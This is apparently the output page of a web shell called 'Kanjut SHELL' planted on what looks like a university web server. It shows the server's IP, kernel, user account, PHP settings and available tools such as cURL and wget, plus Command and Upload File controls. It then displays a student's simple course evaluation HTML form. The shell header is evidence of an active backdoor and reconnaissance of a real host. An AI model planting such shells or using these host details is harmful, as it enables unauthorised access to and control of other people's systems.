Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.129.42.198
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/wcdavis/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/wcdavis/www/CourseForm.html
<!-- 	Wesley Davis
	Assignments 4b and 5
-->
<html>
<head>
<center>
<h2>
Course Evaluation Form!
</h2>
</center>
<hr>

<Form action=CourseAction.php method=post>
Please enter which course you are in and on a scale of 0(bad)--2(good) how 
much you liked the class.<P>
<font size=4 color=blue>
Course enrolled in: <input type=varchar size=5 name="class"><BR>
How much did you like the class?<br>
<INPUT type=radio name=question value=0> Bad (0)<br>
<INPUT type=radio name=question value=1> Average (1)<br>
<INPUT type=radio name=question value=2> Good (2)<br>
<hr>
<input type=submit name="Submit">
<input type=reset name="Reset">
<P>
<A HREF=CourseAction.php>The Course action page</A><p>
<A HREF=assignment5.html>Back to Assignment 5 directory</A><p>
</body>
</html>

Stv3n404 - 2023